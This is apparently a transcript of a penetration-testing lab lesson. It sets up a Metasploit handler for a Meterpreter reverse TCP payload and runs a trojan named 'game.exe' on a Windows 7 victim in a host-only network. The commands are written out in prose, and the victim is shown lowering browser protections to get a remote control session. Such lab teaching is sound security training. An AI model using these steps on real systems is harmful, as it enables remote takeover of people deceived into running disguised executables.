Now that we've created our exploit payload and we've set it up in a shared folder on our Apache server, our web server, it's time to switch back over and we're going to run this exploit on our Windows 7 computer. And now we need to establish a handler so that when that payload file phones home or calls back to our 10.0.3.5 Kali Linux computer, it will be able to do something to exploit and to compromise that Windows 7 computer. So we'll set up a handler by saying use exploit /multi mu tab /handler ha tab and press enter. Now we're going to tell it what to handle. We're going to say set payload Windows /meterpreter /reverse _ TCP and press enter. And we should be able to show the options. You can see that it requires an L host, a local host, and we haven't set one up yet. So let's put our L host address in as 10.0.3.5. I will say set LHOST, and these have to be all uppercase. Set lhost 10.0.3.5 or whatever the IP address is of your Kali Linux computer. So our local host that we will be talking back and forth with from our Windows 7 computer is our Kali Linux computer 10.0.3.5. We can show the options one more time and we can see that we filled everything in. Now we should be able to run the exploit. So we will say exploit -J -Z and hit enter. And we've started the reverse TCP handler on 10.0.3.5. And as connections come in on this reverse TCP handler, in other words, when that Windows 7 computer finds the infected file, downloads it, and then runs it, it's going to call home and we're going to be able to set up that meterpreter session that will control the Windows 7 computer. So let's see how to do that. Let's switch back to Windows 7. And in your Windows 7 computer, open Internet Explorer, or if you've installed another browser on there, that's fine as well. And I've turned the safety under Internet Options, Security, down to medium high, and I've disabled protected mode. That just means that I won't stop myself from downloading this executable file. So you can change those options. It's still medium high. I've just turned off protected mode, and you can set a different custom level if you want, but this one should work fine. Once you've changed those internet options, click OK. And I will surf to 10.0.3.5/share. And if we're correctly on the same network as our Kali Linux computer, that internal host-only network, 10.0.3, I should be able to surf to that share folder if Apache is running well on the Kali Linux box, and I should find that game.exe file. I'm going to click to download it, and I'll say save. And this will save to my downloads folder. And now if I run it, I may have to click through and give it permission, but it looks like game.exe. It sounds fine to download, right? If we run that and then switch back over to our Kali Linux box, you will see that our computer 10.0.3.4, in my case, my Windows 7 computer, has phoned home, and there is now a meterpreter session. That is a direct interactive session that I can use to communicate with that Windows 7 box. I can list files, I can download files, just about anything. The sky's the limit. So when we come back in the next lesson, we're going to see how to use Meterpreter to compromise that Windows 7 computer.